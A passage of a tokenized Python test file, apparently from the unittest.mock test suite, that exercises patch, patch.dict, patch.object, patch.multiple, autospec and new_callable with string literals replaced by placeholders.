, original ) <EOL> def test_patch_dict_with_container_object_and_clear ( self ) : <EOL> foo = Container ( ) <EOL> foo [ '<STR_LIT>' ] = object ( ) <EOL> foo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> original = foo . values . copy ( ) <EOL> @ patch . dict ( foo , clear = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( foo . values , { } ) <EOL> foo [ '<STR_LIT:a>' ] = <NUM_LIT:3> <EOL> foo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> test ( ) <EOL> self . assertEqual ( foo . values , original ) <EOL> @ patch . dict ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } , clear = True ) <EOL> def test ( ) : <EOL> self . assertEqual ( foo . values , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> test ( ) <EOL> self . assertEqual ( foo . values , original ) <EOL> def test_name_preserved ( self ) : <EOL> foo = { } <EOL> @ patch ( '<STR_LIT>' % __name__ , object ( ) ) <EOL> @ patch ( '<STR_LIT>' % __name__ , object ( ) , autospec = True ) <EOL> @ patch . object ( SomeClass , object ( ) ) <EOL> @ patch . dict ( foo ) <EOL> def some_name ( ) : <EOL> pass <EOL> self . assertEqual ( some_name . __name__ , '<STR_LIT>' ) <EOL> def test_patch_with_exception ( self ) : <EOL> foo = { } <EOL> @ patch . dict ( foo , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> def test ( ) : <EOL> raise NameError ( '<STR_LIT>' ) <EOL> try : <EOL> test ( ) <EOL> except NameError : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assertEqual ( foo , { } ) <EOL> def test_patch_dict_with_string ( self ) : <EOL> @ patch . dict ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test ( ) : <EOL> self . assertIn ( '<STR_LIT>' , os . environ ) <EOL> test ( ) <EOL> @ unittest . expectedFailure <EOL> def test_patch_descriptor ( self ) : <EOL> class Nothing ( object ) : <EOL> foo = None <EOL> class Something ( object ) : <EOL> foo = { } <EOL> @ patch . object ( Nothing , '<STR_LIT:foo>' , <NUM_LIT:2> ) <EOL> @ classmethod <EOL> def klass ( cls ) : <EOL> self . assertIs ( cls , Something ) <EOL> @ patch . object ( Nothing , '<STR_LIT:foo>' , <NUM_LIT:2> ) <EOL> @ staticmethod <EOL> def static ( arg ) : <EOL> return arg <EOL> @ patch . dict ( foo ) <EOL> @ classmethod <EOL> def klass_dict ( cls ) : <EOL> self . assertIs ( cls , Something ) <EOL> @ patch . dict ( foo ) <EOL> @ staticmethod <EOL> def static_dict ( arg ) : <EOL> return arg <EOL> self . assertEqual ( Something . static ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> Something . klass ( ) <EOL> self . assertEqual ( Something . static_dict ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> Something . klass_dict ( ) <EOL> something = Something ( ) <EOL> self . assertEqual ( something . static ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> something . klass ( ) <EOL> self . assertEqual ( something . static_dict ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> something . klass_dict ( ) <EOL> def test_patch_spec_set ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , spec_set = SomeClass ) <EOL> def test ( MockClass ) : <EOL> MockClass . z = '<STR_LIT:foo>' <EOL> self . assertRaises ( AttributeError , test ) <EOL> @ patch . object ( support , '<STR_LIT>' , spec_set = SomeClass ) <EOL> def test ( MockClass ) : <EOL> MockClass . z = '<STR_LIT:foo>' <EOL> self . assertRaises ( AttributeError , test ) <EOL> @ patch ( '<STR_LIT>' % __name__ , spec_set = True ) <EOL> def test ( MockClass ) : <EOL> MockClass . z = '<STR_LIT:foo>' <EOL> self . assertRaises ( AttributeError , test ) <EOL> @ patch . object ( support , '<STR_LIT>' , spec_set = True ) <EOL> def test ( MockClass ) : <EOL> MockClass . z = '<STR_LIT:foo>' <EOL> self . assertRaises ( AttributeError , test ) <EOL> def test_spec_set_inherit ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , spec_set = True ) <EOL> def test ( MockClass ) : <EOL> instance = MockClass ( ) <EOL> instance . z = '<STR_LIT:foo>' <EOL> self . assertRaises ( AttributeError , test ) <EOL> def test_patch_start_stop ( self ) : <EOL> original = something <EOL> patcher = patch ( '<STR_LIT>' % __name__ ) <EOL> self . assertIs ( something , original ) <EOL> mock = patcher . start ( ) <EOL> try : <EOL> self . assertIsNot ( mock , original ) <EOL> self . assertIs ( something , mock ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertIs ( something , original ) <EOL> def test_stop_without_start ( self ) : <EOL> patcher = patch ( foo_name , '<STR_LIT:bar>' , <NUM_LIT:3> ) <EOL> self . assertRaises ( RuntimeError , patcher . stop ) <EOL> def test_patchobject_start_stop ( self ) : <EOL> original = something <EOL> patcher = patch . object ( PTModule , '<STR_LIT>' , '<STR_LIT:foo>' ) <EOL> self . assertIs ( something , original ) <EOL> replaced = patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( replaced , '<STR_LIT:foo>' ) <EOL> self . assertIs ( something , replaced ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertIs ( something , original ) <EOL> def test_patch_dict_start_stop ( self ) : <EOL> d = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } <EOL> original = d . copy ( ) <EOL> patcher = patch . dict ( d , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , clear = True ) <EOL> self . assertEqual ( d , original ) <EOL> patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( d , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertEqual ( d , original ) <EOL> def test_patch_dict_class_decorator ( self ) : <EOL> this = self <EOL> d = { '<STR_LIT>' : '<STR_LIT>' } <EOL> original = d . copy ( ) <EOL> class Test ( object ) : <EOL> def test_first ( self ) : <EOL> this . assertEqual ( d , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> def test_second ( self ) : <EOL> this . assertEqual ( d , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> Test = patch . dict ( d , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } , clear = True ) ( Test ) <EOL> self . assertEqual ( d , original ) <EOL> test = Test ( ) <EOL> test . test_first ( ) <EOL> self . assertEqual ( d , original ) <EOL> test . test_second ( ) <EOL> self . assertEqual ( d , original ) <EOL> test = Test ( ) <EOL> test . test_first ( ) <EOL> self . assertEqual ( d , original ) <EOL> test . test_second ( ) <EOL> self . assertEqual ( d , original ) <EOL> def test_get_only_proxy ( self ) : <EOL> class Something ( object ) : <EOL> foo = '<STR_LIT:foo>' <EOL> class SomethingElse : <EOL> foo = '<STR_LIT:foo>' <EOL> for thing in Something , SomethingElse , Something ( ) , SomethingElse : <EOL> proxy = _get_proxy ( thing ) <EOL> @ patch . object ( proxy , '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> def test ( ) : <EOL> self . assertEqual ( proxy . foo , '<STR_LIT:bar>' ) <EOL> test ( ) <EOL> self . assertEqual ( proxy . foo , '<STR_LIT:foo>' ) <EOL> self . assertEqual ( thing . foo , '<STR_LIT:foo>' ) <EOL> self . assertNotIn ( '<STR_LIT:foo>' , proxy . __dict__ ) <EOL> def test_get_set_delete_proxy ( self ) : <EOL> class Something ( object ) : <EOL> foo = '<STR_LIT:foo>' <EOL> class SomethingElse : <EOL> foo = '<STR_LIT:foo>' <EOL> for thing in Something , SomethingElse , Something ( ) , SomethingElse : <EOL> proxy = _get_proxy ( Something , get_only = False ) <EOL> @ patch . object ( proxy , '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> def test ( ) : <EOL> self . assertEqual ( proxy . foo , '<STR_LIT:bar>' ) <EOL> test ( ) <EOL> self . assertEqual ( proxy . foo , '<STR_LIT:foo>' ) <EOL> self . assertEqual ( thing . foo , '<STR_LIT:foo>' ) <EOL> self . assertNotIn ( '<STR_LIT:foo>' , proxy . __dict__ ) <EOL> def test_patch_keyword_args ( self ) : <EOL> kwargs = { '<STR_LIT>' : KeyError , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:foo>' : MagicMock ( ) } <EOL> patcher = patch ( foo_name , ** kwargs ) <EOL> mock = patcher . start ( ) <EOL> patcher . stop ( ) <EOL> self . assertRaises ( KeyError , mock ) <EOL> self . assertEqual ( mock . foo . bar ( ) , <NUM_LIT> ) <EOL> self . assertIsInstance ( mock . foo , MagicMock ) <EOL> def test_patch_object_keyword_args ( self ) : <EOL> kwargs = { '<STR_LIT>' : KeyError , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:foo>' : MagicMock ( ) } <EOL> patcher = patch . object ( Foo , '<STR_LIT:f>' , ** kwargs ) <EOL> mock = patcher . start ( ) <EOL> patcher . stop ( ) <EOL> self . assertRaises ( KeyError , mock ) <EOL> self . assertEqual ( mock . foo . bar ( ) , <NUM_LIT> ) <EOL> self . assertIsInstance ( mock . foo , MagicMock ) <EOL> def test_patch_dict_keyword_args ( self ) : <EOL> original = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } <EOL> copy = original . copy ( ) <EOL> patcher = patch . dict ( original , foo = <NUM_LIT:3> , bar = <NUM_LIT:4> , baz = <NUM_LIT:5> ) <EOL> patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( original , dict ( foo = <NUM_LIT:3> , bar = <NUM_LIT:4> , baz = <NUM_LIT:5> ) ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertEqual ( original , copy ) <EOL> def test_autospec ( self ) : <EOL> class Boo ( object ) : <EOL> def __init__ ( self , a ) : <EOL> pass <EOL> def f ( self , a ) : <EOL> pass <EOL> def g ( self ) : <EOL> pass <EOL> foo = '<STR_LIT:bar>' <EOL> class Bar ( object ) : <EOL> def a ( self ) : <EOL> pass <EOL> def _test ( mock ) : <EOL> mock ( <NUM_LIT:1> ) <EOL> mock . assert_called_with ( <NUM_LIT:1> ) <EOL> self . assertRaises ( TypeError , mock ) <EOL> def _test2 ( mock ) : <EOL> mock . f ( <NUM_LIT:1> ) <EOL> mock . f . assert_called_with ( <NUM_LIT:1> ) <EOL> self . assertRaises ( TypeError , mock . f ) <EOL> mock . g ( ) <EOL> mock . g . assert_called_with ( ) <EOL> self . assertRaises ( TypeError , mock . g , <NUM_LIT:1> ) <EOL> self . assertRaises ( AttributeError , getattr , mock , '<STR_LIT:h>' ) <EOL> mock . foo . lower ( ) <EOL> mock . foo . lower . assert_called_with ( ) <EOL> self . assertRaises ( AttributeError , getattr , mock . foo , '<STR_LIT:bar>' ) <EOL> mock . Bar ( ) <EOL> mock . Bar . assert_called_with ( ) <EOL> mock . Bar . a ( ) <EOL> mock . Bar . a . assert_called_with ( ) <EOL> self . assertRaises ( TypeError , mock . Bar . a , <NUM_LIT:1> ) <EOL> mock . Bar ( ) . a ( ) <EOL> mock . Bar ( ) . a . assert_called_with ( ) <EOL> self . assertRaises ( TypeError , mock . Bar ( ) . a , <NUM_LIT:1> ) <EOL> self . assertRaises ( AttributeError , getattr , mock . Bar , '<STR_LIT:b>' ) <EOL> self . assertRaises ( AttributeError , getattr , mock . Bar ( ) , '<STR_LIT:b>' ) <EOL> def function ( mock ) : <EOL> _test ( mock ) <EOL> _test2 ( mock ) <EOL> _test2 ( mock ( <NUM_LIT:1> ) ) <EOL> self . assertIs ( mock , Foo ) <EOL> return mock <EOL> test = patch ( foo_name , autospec = True ) ( function ) <EOL> mock = test ( ) <EOL> self . assertIsNot ( Foo , mock ) <EOL> test ( ) <EOL> module = sys . modules [ __name__ ] <EOL> test = patch . object ( module , '<STR_LIT>' , autospec = True ) ( function ) <EOL> mock = test ( ) <EOL> self . assertIsNot ( Foo , mock ) <EOL> test ( ) <EOL> def test_autospec_function ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , autospec = True ) <EOL> def test ( mock ) : <EOL> function ( <NUM_LIT:1> ) <EOL> function . assert_called_with ( <NUM_LIT:1> ) <EOL> function ( <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> function . assert_called_with ( <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> self . assertRaises ( TypeError , function ) <EOL> self . assertRaises ( AttributeError , getattr , function , '<STR_LIT:foo>' ) <EOL> test ( ) <EOL> def test_autospec_keywords ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , autospec = True , <EOL> return_value = <NUM_LIT:3> ) <EOL> def test ( mock_function ) : <EOL> return function ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> result = test ( ) <EOL> self . assertEqual ( result , <NUM_LIT:3> ) <EOL> def test_autospec_with_new ( self ) : <EOL> patcher = patch ( '<STR_LIT>' % __name__ , new = <NUM_LIT:3> , autospec = True ) <EOL> self . assertRaises ( TypeError , patcher . start ) <EOL> module = sys . modules [ __name__ ] <EOL> patcher = patch . object ( module , '<STR_LIT>' , new = <NUM_LIT:3> , autospec = True ) <EOL> self . assertRaises ( TypeError , patcher . start ) <EOL> def test_autospec_with_object ( self ) : <EOL> class Bar ( Foo ) : <EOL> extra = [ ] <EOL> patcher = patch ( foo_name , autospec = Bar ) <EOL> mock = patcher . start ( ) <EOL> try : <EOL> self . assertIsInstance ( mock , Bar ) <EOL> self . assertIsInstance ( mock . extra , list ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_autospec_inherits ( self ) : <EOL> FooClass = Foo <EOL> patcher = patch ( foo_name , autospec = True ) <EOL> mock = patcher . start ( ) <EOL> try : <EOL> self . assertIsInstance ( mock , FooClass ) <EOL> self . assertIsInstance ( mock ( <NUM_LIT:3> ) , FooClass ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_autospec_name ( self ) : <EOL> patcher = patch ( foo_name , autospec = True ) <EOL> mock = patcher . start ( ) <EOL> try : <EOL> self . assertIn ( "<STR_LIT>" , repr ( mock ) ) <EOL> self . assertIn ( "<STR_LIT>" , repr ( mock . f ) ) <EOL> self . assertIn ( "<STR_LIT>" , repr ( mock ( None ) ) ) <EOL> self . assertIn ( "<STR_LIT>" , repr ( mock ( None ) . f ) ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_tracebacks ( self ) : <EOL> @ patch . object ( Foo , '<STR_LIT:f>' , object ( ) ) <EOL> def test ( ) : <EOL> raise AssertionError <EOL> try : <EOL> test ( ) <EOL> except : <EOL> err = sys . exc_info ( ) <EOL> result = unittest . TextTestResult ( None , None , <NUM_LIT:0> ) <EOL> traceback = result . _exc_info_to_string ( err , self ) <EOL> self . assertIn ( '<STR_LIT>' , traceback ) <EOL> def test_new_callable_patch ( self ) : <EOL> patcher = patch ( foo_name , new_callable = NonCallableMagicMock ) <EOL> m1 = patcher . start ( ) <EOL> patcher . stop ( ) <EOL> m2 = patcher . start ( ) <EOL> patcher . stop ( ) <EOL> self . assertIsNot ( m1 , m2 ) <EOL> for mock in m1 , m2 : <EOL> self . assertNotCallable ( m1 ) <EOL> def test_new_callable_patch_object ( self ) : <EOL> patcher = patch . object ( Foo , '<STR_LIT:f>' , new_callable = NonCallableMagicMock ) <EOL> m1 = patcher . start ( ) <EOL> patcher . stop ( ) <EOL> m2 = patcher . start ( ) <EOL> patcher . stop ( ) <EOL> self . assertIsNot ( m1 , m2 ) <EOL> for mock in m1 , m2 : <EOL> self . assertNotCallable ( m1 ) <EOL> def test_new_callable_keyword_arguments ( self ) : <EOL> class Bar ( object ) : <EOL> kwargs = None <EOL> def __init__ ( self , ** kwargs ) : <EOL> Bar . kwargs = kwargs <EOL> patcher = patch ( foo_name , new_callable = Bar , arg1 = <NUM_LIT:1> , arg2 = <NUM_LIT:2> ) <EOL> m = patcher . start ( ) <EOL> try : <EOL> self . assertIs ( type ( m ) , Bar ) <EOL> self . assertEqual ( Bar . kwargs , dict ( arg1 = <NUM_LIT:1> , arg2 = <NUM_LIT:2> ) ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_new_callable_spec ( self ) : <EOL> class Bar ( object ) : <EOL> kwargs = None <EOL> def __init__ ( self , ** kwargs ) : <EOL> Bar . kwargs = kwargs <EOL> patcher = patch ( foo_name , new_callable = Bar , spec = Bar ) <EOL> patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( Bar . kwargs , dict ( spec = Bar ) ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> patcher = patch ( foo_name , new_callable = Bar , spec_set = Bar ) <EOL> patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( Bar . kwargs , dict ( spec_set = Bar ) ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_new_callable_create ( self ) : <EOL> non_existent_attr = '<STR_LIT>' % foo_name <EOL> p = patch ( non_existent_attr , new_callable = NonCallableMock ) <EOL> self . assertRaises ( AttributeError , p . start ) <EOL> p = patch ( non_existent_attr , new_callable = NonCallableMock , <EOL> create = True ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertNotCallable ( m , magic = False ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_new_callable_incompatible_with_new ( self ) : <EOL> self . assertRaises ( <EOL> ValueError , patch , foo_name , new = object ( ) , new_callable = MagicMock <EOL> ) <EOL> self . assertRaises ( <EOL> ValueError , patch . object , Foo , '<STR_LIT:f>' , new = object ( ) , <EOL> new_callable = MagicMock <EOL> ) <EOL> def test_new_callable_incompatible_with_autospec ( self ) : <EOL> self . assertRaises ( <EOL> ValueError , patch , foo_name , new_callable = MagicMock , <EOL> autospec = True <EOL> ) <EOL> self . assertRaises ( <EOL> ValueError , patch . object , Foo , '<STR_LIT:f>' , new_callable = MagicMock , <EOL> autospec = True <EOL> ) <EOL> def test_new_callable_inherit_for_mocks ( self ) : <EOL> class MockSub ( Mock ) : <EOL> pass <EOL> MockClasses = ( <EOL> NonCallableMock , NonCallableMagicMock , MagicMock , Mock , MockSub <EOL> ) <EOL> for Klass in MockClasses : <EOL> for arg in '<STR_LIT>' , '<STR_LIT>' : <EOL> kwargs = { arg : True } <EOL> p = patch ( foo_name , new_callable = Klass , ** kwargs ) <EOL> m = p . start ( ) <EOL> try : <EOL> instance = m . return_value <EOL> self . assertRaises ( AttributeError , getattr , instance , '<STR_LIT:x>' ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_new_callable_inherit_non_mock ( self ) : <EOL> class NotAMock ( object ) : <EOL> def __init__ ( self , spec ) : <EOL> self . spec = spec <EOL> p = patch ( foo_name , new_callable = NotAMock , spec = True ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertTrue ( is_instance ( m , NotAMock ) ) <EOL> self . assertRaises ( AttributeError , getattr , m , '<STR_LIT>' ) <EOL> finally : <EOL> p . stop ( ) <EOL> self . assertEqual ( m . spec , Foo ) <EOL> def test_new_callable_class_decorating ( self ) : <EOL> test = self <EOL> original = Foo <EOL> class SomeTest ( object ) : <EOL> def _test ( self , mock_foo ) : <EOL> test . assertIsNot ( Foo , original ) <EOL> test . assertIs ( Foo , mock_foo ) <EOL> test . assertIsInstance ( Foo , SomeClass ) <EOL> def test_two ( self , mock_foo ) : <EOL> self . _test ( mock_foo ) <EOL> def test_one ( self , mock_foo ) : <EOL> self . _test ( mock_foo ) <EOL> SomeTest = patch ( foo_name , new_callable = SomeClass ) ( SomeTest ) <EOL> SomeTest ( ) . test_one ( ) <EOL> SomeTest ( ) . test_two ( ) <EOL> self . assertIs ( Foo , original ) <EOL> def test_patch_multiple ( self ) : <EOL> original_foo = Foo <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> patcher1 = patch . multiple ( foo_name , f = <NUM_LIT:1> , g = <NUM_LIT:2> ) <EOL> patcher2 = patch . multiple ( Foo , f = <NUM_LIT:1> , g = <NUM_LIT:2> ) <EOL> for patcher in patcher1 , patcher2 : <EOL> patcher . start ( ) <EOL> try : <EOL> self . assertIs ( Foo , original_foo ) <EOL> self . assertEqual ( Foo . f , <NUM_LIT:1> ) <EOL> self . assertEqual ( Foo . g , <NUM_LIT:2> ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertIs ( Foo , original_foo ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> @ patch . multiple ( foo_name , f = <NUM_LIT:3> , g = <NUM_LIT:4> ) <EOL> def test ( ) : <EOL> self . assertIs ( Foo , original_foo ) <EOL> self . assertEqual ( Foo . f , <NUM_LIT:3> ) <EOL> self . assertEqual ( Foo . g , <NUM_LIT:4> ) <EOL> test ( ) <EOL> def test_patch_multiple_no_kwargs ( self ) : <EOL> self . assertRaises ( ValueError , patch . multiple , foo_name ) <EOL> self . assertRaises ( ValueError , patch . multiple , Foo ) <EOL> def test_patch_multiple_create_mocks ( self ) : <EOL> original_foo = Foo <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> @ patch . multiple ( foo_name , f = DEFAULT , g = <NUM_LIT:3> , foo = DEFAULT ) <EOL> def test ( f , foo ) : <EOL> self . assertIs ( Foo , original_foo ) <EOL> self . assertIs ( Foo . f , f ) <EOL> self . assertEqual ( Foo . g , <NUM_LIT:3> ) <EOL> self . assertIs ( Foo . foo , foo ) <EOL> self . assertTrue ( is_instance ( f , MagicMock ) ) <EOL> self . assertTrue ( is_instance ( foo , MagicMock ) ) <EOL> test ( ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_patch_multiple_create_mocks_different_order ( self ) : <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> patcher = patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:3> ) <EOL> patcher . attribute_name = '<STR_LIT:f>' <EOL> other = patch . object ( Foo , '<STR_LIT:g>' , DEFAULT ) <EOL> other . attribute_name = '<STR_LIT:g>' <EOL> patcher . additional_patchers = [ other ] <EOL> @ patcher <EOL> def test ( g ) : <EOL> self . assertIs ( Foo . g , g ) <EOL> self . assertEqual ( Foo . f , <NUM_LIT:3> ) <EOL> test ( ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_patch_multiple_stacked_decorators ( self ) : <EOL> original_foo = Foo <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> @ patch . multiple ( foo_name , f = DEFAULT ) <EOL> @ patch . multiple ( foo_name , foo = DEFAULT ) <EOL> @ patch ( foo_name + '<STR_LIT>' ) <EOL> def test1 ( g , ** kwargs ) : <EOL> _test ( g , ** kwargs ) <EOL> @ patch . multiple ( foo_name , f = DEFAULT ) <EOL> @ patch ( foo_name + '<STR_LIT>' ) <EOL> @ patch . multiple ( foo_name , foo = DEFAULT ) <EOL> def test2 ( g , ** kwargs ) : <EOL> _test ( g , ** kwargs ) <EOL> @ patch ( foo_name + '<STR_LIT>' ) <EOL> @ patch . multiple ( foo_name , f = DEFAULT ) <EOL> @ patch . multiple ( foo_name , foo = DEFAULT ) <EOL> def test3 ( g , ** kwargs ) : <EOL> _test ( g , ** kwargs ) <EOL> def _test ( g , ** kwargs ) : <EOL> f = kwargs . pop ( '<STR_LIT:f>' ) <EOL> foo = kwargs . pop ( '<STR_LIT:foo>' ) <EOL> self . assertFalse ( kwargs ) <EOL> self . assertIs ( Foo , original_foo ) <EOL> self . assertIs ( Foo . f , f ) <EOL> self . assertIs ( Foo . g , g ) <EOL> self . assertIs ( Foo . foo , foo ) <EOL> self . assertTrue ( is_instance ( f , MagicMock ) ) <EOL> self . assertTrue ( is_instance ( g , MagicMock ) ) <EOL> self . assertTrue ( is_instance ( foo , MagicMock ) ) <EOL> test1 ( ) <EOL> test2 ( ) <EOL> test3 ( ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_patch_multiple_create_mocks_patcher ( self ) : <EOL> original_foo = Foo <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> patcher = patch . multiple ( foo_name , f = DEFAULT , g = <NUM_LIT:3> , foo = DEFAULT ) <EOL> result = patcher . start ( ) <EOL> try : <EOL> f = result [ '<STR_LIT:f>' ] <EOL> foo = result [ '<STR_LIT:foo>' ] <EOL> self . assertEqual ( set ( result ) , set ( [ '<STR_LIT:f>' , '<STR_LIT:foo>' ] ) ) <EOL> self . assertIs ( Foo , original_foo ) <EOL> self . assertIs ( Foo . f , f ) <EOL> self . assertIs ( Foo . foo , foo ) <EOL> self . assertTrue ( is_instance ( f , MagicMock ) ) <EOL> self . assertTrue ( is_instance ( foo , MagicMock ) ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_patch_multiple_decorating_class ( self ) : <EOL> test = self <EOL> original_foo = Foo <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> class SomeTest ( object ) : <EOL> def _test ( self , f , foo ) : <EOL> test . assertIs ( Foo , original_foo ) <EOL> test . assertIs ( Foo . f , f ) <EOL> test . assertEqual ( Foo . g , <NUM_LIT:3> ) <EOL> test . assertIs ( Foo . foo , foo ) <EOL> test . assertTrue ( is_instance ( f , MagicMock ) ) <EOL> test . assertTrue ( is_instance ( foo , MagicMock ) ) <EOL> def test_two ( self , f , foo ) : <EOL> self . _test ( f , foo ) <EOL> def test_one ( self , f , foo ) : <EOL> self . _test ( f , foo ) <EOL> SomeTest = patch . multiple ( <EOL> foo_name , f = DEFAULT , g = <NUM_LIT:3> , foo = DEFAULT <EOL> ) ( SomeTest ) <EOL> thing = SomeTest ( ) <EOL> thing . test_one ( ) <EOL> thing . test_two ( ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_patch_multiple_create ( self ) : <EOL> patcher = patch . multiple ( Foo , blam = '<STR_LIT>' ) <EOL> self . assertRaises ( AttributeError , patcher . start ) <EOL> patcher = patch . multiple ( Foo , blam = '<STR_LIT>' , create = True ) <EOL> patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( Foo . blam , '<STR_LIT>' ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertFalse ( hasattr ( Foo , '<STR_LIT>' ) ) <EOL> def test_patch_multiple_spec_set ( self ) : <EOL> patcher = patch . multiple ( Foo , foo = DEFAULT , spec_set = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> result = patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( Foo . foo , result [ '<STR_LIT:foo>' ] ) <EOL> Foo . foo . a ( <NUM_LIT:1> ) <EOL> Foo . foo . b ( <NUM_LIT:2> ) <EOL> Foo . foo . a . assert_called_with ( <NUM_LIT:1> ) <EOL> Foo . foo . b . assert_called_with ( <NUM_LIT:2> ) <EOL> self . assertRaises ( AttributeError , setattr , Foo . foo , '<STR_LIT:c>' , None ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_patch_multiple_new_callable ( self ) : <EOL> class Thing ( object ) : <EOL> pass <EOL> patcher = patch . multiple ( <EOL> Foo , f = DEFAULT , g = DEFAULT , new_callable = Thing <EOL> ) <EOL> result = patcher . start ( ) <EOL> try : <EOL> self . assertIs ( Foo . f , result [ '<STR_LIT:f>' ] ) <EOL> self . assertIs ( Foo . g , result [ '<STR_LIT:g>' ] ) <EOL> self . assertIsInstance ( Foo . f , Thing ) <EOL> self . assertIsInstance ( Foo . g , Thing ) <EOL> self . assertIsNot ( Foo . f , Foo . g ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_nested_patch_failure ( self ) : <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> @ patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> def thing1 ( ) : <EOL> pass <EOL> @ patch . object ( Foo , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> def thing2 ( ) : <EOL> pass <EOL> @ patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> def thing3 ( ) : <EOL> pass <EOL> for func in thing1 , thing2 , thing3 : <EOL> self . assertRaises ( AttributeError , func ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_new_callable_failure ( self ) : <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> original_foo = Foo . foo <EOL> def crasher ( ) : <EOL> raise NameError ( '<STR_LIT>' ) <EOL> @ patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:foo>' , new_callable = crasher ) <EOL> @ patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> def thing1 ( ) : <EOL> pass <EOL> @ patch . object ( Foo , '<STR_LIT:foo>' , new_callable = crasher ) <EOL> @ patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> def thing2 ( ) : <EOL> pass <EOL> @ patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:foo>' 